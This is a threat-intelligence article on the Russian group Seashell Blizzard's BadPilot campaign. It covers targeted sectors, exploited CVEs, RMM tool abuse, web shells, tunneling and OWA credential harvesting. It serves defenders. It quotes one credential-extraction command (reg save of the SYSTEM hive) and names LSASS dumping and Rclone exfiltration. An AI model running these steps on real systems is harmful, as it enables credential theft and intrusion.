"BadPilot" Campaign From Russian APT Pose Ongoing Cyber Threat to Western Nations

An extensive array of threat capabilities associated with Seashell Blizzard (aka APT44, Sandworm, UAC-0145, Voodoo Bear), a cyber threat actor linked to Russian Military Intelligence Unit 74455 (GRU), has emerged following an expansion in its operations beyond Eastern Europe, targeting organizations across the United States, Canada, Australia, Europe, Central Asia, and the Middle East. According to Microsoft Threat Intelligence, the group’s BadPilot campaign has affected critical sectors, with recent activity focused on energy, oil and gas, telecommunications, shipping, and defense manufacturing. "Since early 2024, the subgroup has expanded its range of access to include targets in the United States and the United Kingdom," with ongoing operations "built upon previous efforts between 2021 and 2023 which predominantly affected Ukraine, Europe, and specific verticals in Central and South Asia, and the Middle East." Seashell Blizzard has leveraged techniques to establish long-term persistence on compromised systems, enabling espionage, information operations, and destructive cyberattacks. Microsoft also cautions, "Seashell Blizzard’s specialized operations have ranged from espionage to information operations and cyber-enabled disruptions, usually in the form of destructive attacks and manipulation of industrial control systems (ICS)," referencing the group's use of wiper malware.

The BadPilot campaign exploits multiple vulnerabilities to gain initial access to targeted networks. Exploited vulnerabilities observed by Microsoft include Microsoft Exchange ProxyShell (CVE-2021-34473), Zimbra Collaboration (CVE-2022-41352), OpenFire (CVE-2023-32315), JetBrains TeamCity (CVE-2023-42793), Microsoft Outlook (CVE-2023-23397), ConnectWise ScreenConnect (CVE-2024-1709), Fortinet FortiClient EMS (CVE-2023-48788), and JBOSS (exact CVE unknown). A primary attack chain from the group's recent campaigns—active since "February 24, 2024 – present"—focuses on deploying remote monitoring and management (RMM) tools. Once access is achieved, Seashell Blizzard downloads RMM tools using living-off-the-land binaries such as "Bitsadmin," "curl," and "certutil." This enables them to maintain command and control over compromised systems using Atera Agent, Splashtop, and ScreenConnect. Following RMM installation, they conduct credential theft using registry extractions (reg save HKLM\SYSTEM C:\ProgramData\sys), process dumps of LSASS via renamed Procdump, and Task Manager for additional credential harvesting. Data exfiltration is facilitated through Rclone. Another notable post-exploitation action involved reinforcing persistence and command-and-control (C2) with the deployment of OpenSSH.

Another attack pattern that has been actively used focuses on web shell deployment, which has been observed since late 2021. Key vulnerabilities exploited include those in Microsoft Exchange and Zimbra, allowing Seashell Blizzard to install web shells that run rapid reconnaissance operations and maintain persistent network footholds. These web shells initiate system fingerprinting commands such as "systeminfo," "arp -a," and "whoami" to gather information about the target environment. Additionally, the threat actors deploy tunneling tools like Chisel, plink, and rsockscan to create encrypted communication channels, enabling undetected lateral movement. "Seashell Blizzard carried out measures to establish long-term persistence on affected systems," allowing for prolonged intelligence-gathering and network manipulation operations.

Another key tactic involves modifying infrastructure to enhance network influence through credential collection. Between late 2021 and 2024, Seashell Blizzard altered Outlook Web Access (OWA) sign-in pages and DNS configurations to harvest credentials. JavaScript-based modifications to OWA login portals captured and transmitted credentials in real-time to attacker-controlled infrastructure. Additionally, DNS A record modifications suggest the possibility of credential interception from authentication services. These tactics provide Seashell Blizzard with an expanded access capability, reinforcing their ability to manipulate networks at a strategic level.

Microsoft Threat Intelligence warns that Seashell Blizzard’s operations align with Russia’s geopolitical objectives, particularly in the context of the Ukrainian conflict. "Seashell Blizzard’s far-reaching, opportunistic access methods likely offer Russia expansive opportunities for niche operations and activities that will continue to be valuable over the medium term."